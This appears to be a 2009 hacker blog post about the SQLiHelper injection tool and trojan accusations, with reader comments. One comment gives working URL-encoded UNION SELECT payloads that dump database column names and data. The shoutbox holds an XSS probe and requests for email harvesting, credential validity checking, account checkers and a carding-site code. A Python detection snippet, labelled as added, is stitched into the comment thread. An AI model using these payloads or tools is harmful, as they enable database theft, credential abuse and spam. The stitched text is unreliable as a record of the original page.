Reiluke

nobody is safe online

SQLihelper as trojan

September 1, 2009

 

I don't know why the SQLiHelper executables are detected as “trojan.win32.agent2.chtj”; it is a fucking false positive. Some fool is spreading my app with a bound trojan, and now my executables are detected as well.

I rebuilt the source and now the exe is not detected anymore.

download link

 

For those who emailed me: I don't put trojans in my apps. Run it in a sandbox; if you can find proof, you can post it in the shoutbox.

Right now I'm working on the email check and the RapidShare checker using the API.

Posted by reiluke at 10:47 am | permalink

Previous Comments

Hello friend!

You are too good. I used your tools and they are too good .. well, I'm very excited to see what you give us next.

Well, I have 1 idea for you to make 1 new tool for us .. as you know, we guys need leads (email lists), so can you make a Google email grabber .. with options like you use in Exploit Scanner (dork + site (.com, .net, .au, .eu) + results per page (10 or 100) and extract 1 more option (name)), because we guys mostly use names

like

steve intext:”@example.com” site:.com

but this is a headache because we need to page through 1 by 1.

So please kindly help us to do this job.

thank you very very much

Posted by MaxDeMon at September 13, 2009, 3:38 am

yeah, some other people bind your SQL helper with a trojan ….. btw reiluke, please join the philker group on hackforum.net. I need a skilled Pinoy like you .. lol

Posted by krizhiel at September 13, 2009, 7:36 pm

Great tool. Congratz!

I’ve found some points that might require your attention for future releases.

Get Columns
Your command line
+and+1=0+%20Union%20Select%20%201%20,%20UNHEX(HEX(concat(0x5B6B65795D,column_name,0x5B6B65795D)))%20,3,4,5,6,7,8+FROM+INFORMATION_SCHEMA.columns+where+table_name=Concat(char(83),char(69),char(78),char(72),char(65))+LIMIT%201,1--

It starts the LIMIT at 1,1 instead of 0,1, so the first column_name is not being captured.

It does not include an additional table_schema condition, since it is possible to have the same table_name in more than one database.

Proposed command line
+and+1=0+%20Union%20Select%20%201%20,%20UNHEX(HEX(concat(0x5B6B65795D,column_name,0x5B6B65795D)))%20,3,4,5,6,7,8+FROM+INFORMATION_SCHEMA.columns+where+table_name=Concat(char(83),char(69),char(78),char(72),char(65))%20AND%20table_schema=Concat(char(117),char(115),char(117),char(97),char(114),char(105),char(111))+LIMIT%200,1--

Dump Now
When dumping, the LIMIT operator is skipping some rows, i.e., it would be expected to follow a sequential logic (0,1 - 1,1 - 2,1 - …). However, it sometimes does not perform as expected (… - 5,1 - 6,1 - 7,1 - 8,1 - 10,1 - 12,1), so the current dumped value is not equal to the counted one and therefore not all data are being extracted.

Posted by aklnuts at September 15, 2009, 3:47 am
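
On the receiving side, requests of the shape quoted in the comment above are recognisable in web server logs once the URL encoding is undone. The following is an added example, not code from the original post, its comments or SQLiHelper; the indicator names, helper functions and sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Indicators derived from the shape of the request quoted in the comment above.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\s*\.\s*(columns|tables)\b"),
    "always_false_guard": re.compile(r"\band\s+1\s*=\s*0\b"),
    "char_concat_string": re.compile(r"concat\(\s*char\(\d+\)(\s*,\s*char\(\d+\))+\s*\)"),
    "hex_literal_marker": re.compile(r"\b0x[0-9a-f]{6,}\b"),
    "limit_paging": re.compile(r"\blimit\s+\d+\s*,\s*\d+"),
    "trailing_comment": re.compile(r"(--|#)\s*$"),
}

def normalise(query_string):
    """Decode '+' and %XX (up to 3 passes, to undo double encoding),
    squeeze whitespace and lowercase."""
    text = query_string
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text).strip().lower()

def indicators(query_string):
    """Return the sorted names of all indicators present in the query string."""
    text = normalise(query_string)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def is_schema_enumeration(query_string):
    """Flag only requests that combine UNION SELECT with an information_schema read."""
    return {"union_select", "information_schema"} <= set(indicators(query_string))

# Constructed sample query strings (not real traffic).
SAMPLES = [
    # Same shape as the quoted request: mixed '+' and %20, hex markers, char() strings.
    "id=5+and+1=0+%20Union%20Select%201,UNHEX(HEX(concat(0x5B6B65795D,column_name,0x5B6B65795D))),3"
    "+FROM+INFORMATION_SCHEMA.columns+where+table_name=Concat(char(83),char(69))+LIMIT%201,1--",
    # Benign search that happens to contain the words "union select".
    "q=student+union+select+committee&page=2",
    # Double-encoded variant; only visible after a second decoding pass.
    "id=5%2520union%2520select%25201,2%2520from%2520information_schema.tables",
]
```

Requiring both `union_select` and `information_schema` keeps the benign search in the second sample from being flagged, while the remaining indicators add context for triage.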

Still detected as a trojan. Please check your PC.

Posted by sangte at September 17, 2009, 12:23 am

Your newly compiled sqlihelper is detected by Kaspersky too, man. tsk tsk tsk

Posted by kamayutak at September 17, 2009, 5:51 pm


Say Somethin'

eugene:

can anyone post a working email checker? will be very much appreciated

123:

where in the Philippines are you?

">alert(String.fromCharCode(88, 83, 83)):

“>alert(String.fromCharCode(88, 83, 83))

Pedro Jacques:

Does anyone have an idea how to use the POST method in sqlihelper? Thnkxxx

aryanne:

does someone have a sign-up code for shopadmin.cc? please email it to me… richardsilly888@yahoo.com

Pedro Jacques:

How to work with the POST method in sqlihelper 2.7?

!!!!!:

http://www.sunbeltsecurity.com/threatdisplay.aspx?name=Trojan.Win32.Agent2.cmdd&tid=4655164&cs=9D02F413D6D4F1E4E328F3A7F786E24C

it's backdoored :P AVG detected it, check the link and see the level of infection

admen:

Can you make a mirror to your tools ? Rapidshare sucks ..

itsme:

email checker isn't working indeed.. all emails are correct, even with 3 characters :o

abdulahaveh:

e-mail checker doesn't workkkkkkkkkkkkkkkkkkkkkkk

Dexa:

Email checker doesn't work :(

PBL:

Sup, there seems to be a problem with your email checker, as it places invalid email:pass in the valid section; pretty much all the emails are transferred to the valid box

pacman:

nice blog site. really good.
anyway, just sharing. you can watch the manny pacquiao video collection here:
http://boxing-tube.tk
or here:
http://mannypacquiao.tk

Ralf69:

New Rapidshare Collector’s & Premium Accounts Checker.
Demo: http://ralf69.justfree.com/
I will sell script for mass verification data Rapidshare Collector’s & Premium Accounts.

ZaraByte:

@rd0 Linux users don’t need SQL injecting programs, they already know how to manually inject or don't even waste their time :P

rd0:

Is there a version of SQLiHelper for Linux?
I tried with Mono but it doesn't work..

mox:

looking for a sqli scanner, that scans not only php but also cfm and asp. Thanks !

calvin:

After I used the exploit scanner, I got like 600 sites to be tested. SQL error based is checkmarked and I click test; the progress bar runs to 100% in like 2 seconds and no vuln sites are shown on the list

butterflycode:

the keylogger html always prompts “There was a problem with the request” every time it's being opened. what's the prob, bro? pls mail me. thanks and waiting for your reply
